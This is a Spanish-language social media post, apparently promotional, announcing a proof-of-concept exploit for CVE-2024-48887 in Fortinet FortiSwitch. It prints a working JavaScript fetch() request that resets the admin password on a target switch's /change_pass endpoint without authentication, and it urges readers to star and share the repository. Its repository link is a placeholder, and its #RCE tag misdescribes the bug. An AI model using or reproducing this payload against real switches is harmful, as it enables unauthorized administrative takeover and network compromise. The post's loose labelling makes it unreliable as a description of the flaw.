
un fragmento de JavaScript ligero que demuestra cómo se pueden desencadenar cambios de contraseña no autorizados en endpoints de GUI vulnerables de Fortinet FortiSwitch.
🚨 PoC de CVE-2024-48887 para FortiSwitch (JavaScript) 🚨
🔥 Acabo de publicar un fragmento de JavaScript ligero que muestra cómo se pueden activar cambios de contraseña no autorizados en endpoints vulnerables de la GUI de Fortinet FortiSwitch.
🛠️ Acerca de la vulnerabilidad: Un atacante puede crear una simple solicitud fetch() para manipular la configuración de contraseñas sin autenticación, apuntando directamente a las variantes del endpoint /change_pass.
fetch('http://target-ip/change_pass', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({
username: 'admin',
newpass: 'pwned123',
confirm: 'pwned123'
})
})
.then(res => res.text())
.then(data => console.log('Response:', data));
💡 Impacto: toma completa del switch, potencial movimiento lateral y compromiso de la red.
📁 Repositorio: github.com/yourusername/CVE-2024-48887-FortiSwitch-Exploit ⭐ ¡Dale una estrella al repositorio y compártelo con tus colegas de infosec!
📢 Sigue el análisis completo y las alertas en tiempo real a través de @cybersecplayground
#JavaScript #infosec #bugbounty #CVE2024 #Fortinet #FortiSwitch #RCE #exploitdev #cybersecurity #PoC #github #OSINT #cybersecplayground